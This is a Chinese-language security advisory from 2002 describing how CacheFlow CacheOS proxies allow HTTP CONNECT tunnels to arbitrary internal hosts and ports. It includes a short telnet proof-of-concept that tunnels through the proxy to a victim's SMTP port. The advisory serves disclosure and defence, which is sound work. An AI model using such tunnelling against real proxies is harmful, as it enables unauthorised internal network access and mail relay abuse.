CacheFlow CacheOS HTTP CONNECT TCP通道漏洞发布时间:2002-02-23 更新时间:2002-02-23 严重程度:中 威胁程度:其它 错误类型:配置错误 利用方式:服务器模式 BUGTRAQ ID:4143 受影响系统 CacheFlow CacheOS详细描述 CacheOS 是CacheFlow web cache 系统的固件。 CacheOS包括对HTTP CONNECT模式的支持,可以通过通过HTTP请求来建立任意TCP 连接通道,这种模式在RFC2817中有详细描述,用来在HTTP上构建通用机制来实现 Transit Layer Security (TLS)。 CacheFlow代理允许通过使用对内部系统的CONNECT请求来访问内部网络任意机器 和端口。在接收到CONNECT请求后,CacheFlow服务器就会作为一个TCP代理使用, 建立会话通道化,这可以用来针对使用内部机器作为开放中继等攻击。 测试代码 $ telnet open.web.proxy.org 80 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. CONNECT victim.host.org:25 HTTP/1.0 HTTP/1.0 200 Connection established 220 victim.host.org ESMTP Sendmail 8.11.6/8.11.6; Tue, 19 Feb 2002 14:16:51 -0800 (PST) 解决方案 尚无 相关信息 Steve VanDevender <stevev@hexadecimal.uoregon.edu>. 参考:http://online.securityfocus.com/archive/1/257229 相关主页:http://www.cacheflow.com/index.cfm |
